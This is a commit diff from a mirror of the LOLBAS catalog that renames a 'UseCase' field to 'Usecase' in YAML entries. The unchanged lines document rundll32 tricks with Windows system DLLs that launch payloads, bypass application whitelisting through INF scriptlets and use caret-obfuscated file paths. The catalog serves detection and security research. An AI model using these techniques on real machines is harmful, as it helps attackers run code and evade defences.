public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-26 06:49:09 +01:00
Code Issues Projects Releases Wiki Activity

Fix Usecase field

Browse Source
This commit is contained in:
Wietze 2021-01-10 15:54:00 +00:00
parent 5012f95152
commit 2e08819eef
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
11 changed files with 29 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
yml/OSLibraries/Advpack.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
UseCase: Run local or remote script(let) code through INF file specification.
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1085
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
UseCase: Run local or remote script(let) code through INF file specification.
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1085
@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function.
UseCase: Load a DLL payload.
Usecase: Load a DLL payload.
Category: Execute
Privileges: User
MitreID: T1085
@ -30,14 +30,14 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function.
UseCase: Run an executable payload.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
- Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Description: Launch command line by calling the RegisterOCX function.
UseCase: Run an executable payload.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1085

10
yml/OSLibraries/Ieadvpack.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
UseCase: Run local or remote script(let) code through INF file specification.
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1085
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
UseCase: Run local or remote script(let) code through INF file specification.
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1085
@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function.
UseCase: Load a DLL payload.
Usecase: Load a DLL payload.
Category: Execute
Privileges: User
MitreID: T1085
@ -30,14 +30,14 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function.
UseCase: Run an executable payload.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Description: Launch command line by calling the RegisterOCX function.
UseCase: Run an executable payload.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1085

2
yml/OSLibraries/Ieframe.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Category: Execute
Privileges: User
MitreID: T1085

2
yml/OSLibraries/Mshtml.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).
UseCase: Launch an HTA application.
Usecase: Launch an HTA application.
Category: Execute
Privileges: User
MitreID: T1085

2
yml/OSLibraries/Pcwutl.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe
Description: Launch executable by calling the LaunchApplication function.
UseCase: Launch an executable.
Usecase: Launch an executable.
Category: Execute
Privileges: User
MitreID: T1085

4
yml/OSLibraries/Setupapi.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
UseCase: Run local or remote script(let) code through INF file specification.
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1085
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
UseCase: Load an executable payload.
Usecase: Load an executable payload.
Category: Execute
Privileges: User
MitreID: T1085

2
yml/OSLibraries/Shdocvw.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Category: Execute
Privileges: User
MitreID: T1085

6
yml/OSLibraries/Shell32.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll
Description: Launch a DLL payload by calling the Control_RunDLL function.
UseCase: Load a DLL payload.
Usecase: Load a DLL payload.
Category: Execute
Privileges: User
MitreID: T1085
@ -14,14 +14,14 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
Description: Launch an executable by calling the ShellExec_RunDLL function.
UseCase: Run an executable payload.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
- Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
Description: Launch command line by calling the ShellExec_RunDLL function.
UseCase: Run an executable payload.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1085

4
yml/OSLibraries/Syssetup.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
Category: AWL Bypass
Privileges: User
MitreID: T1085
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
UseCase: Load an executable payload.
Usecase: Load an executable payload.
Category: Execute
Privileges: User
MitreID: T1085

12
yml/OSLibraries/Url.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
Description: Launch a HTML application payload by calling OpenURL.
UseCase: Invoke an HTML Application via mshta.exe (Default Handler).
Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
Category: Execute
Privileges: User
MitreID: T1085
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
UseCase: Load an executable payload by calling a .url file with or without quotes.
Usecase: Load an executable payload by calling a .url file with or without quotes.
Category: Execute
Privileges: User
MitreID: T1085
@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling OpenURL.
UseCase: Load an executable payload by specifying the file protocol handler (obfuscated).
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
Category: Execute
Privileges: User
MitreID: T1085
@ -30,7 +30,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
Description: Launch an executable by calling FileProtocolHandler.
UseCase: Launch an executable.
Usecase: Launch an executable.
Category: Execute
Privileges: User
MitreID: T1085
@ -38,7 +38,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling FileProtocolHandler.
UseCase: Load an executable payload by specifying the file protocol handler (obfuscated).
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
Category: Execute
Privileges: User
MitreID: T1085
@ -46,7 +46,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
Description: Launch a HTML application payload by calling FileProtocolHandler.
UseCase: Invoke an HTML Application via mshta.exe (Default Handler).
Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
Category: Execute
Privileges: User
MitreID: T1085

4
yml/OSLibraries/Zipfldr.yml
View File

@ -6,7 +6,7 @@ Created: 2018-05-25
Commands:
- Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe
Description: Launch an executable payload by calling RouteTheCall.
UseCase: Launch an executable.
Usecase: Launch an executable.
Category: Execute
Privileges: User
MitreID: T1085
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows
- Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable payload by calling RouteTheCall (obfuscated).
UseCase: Launch an executable.
Usecase: Launch an executable.
Category: Execute
Privileges: User
MitreID: T1085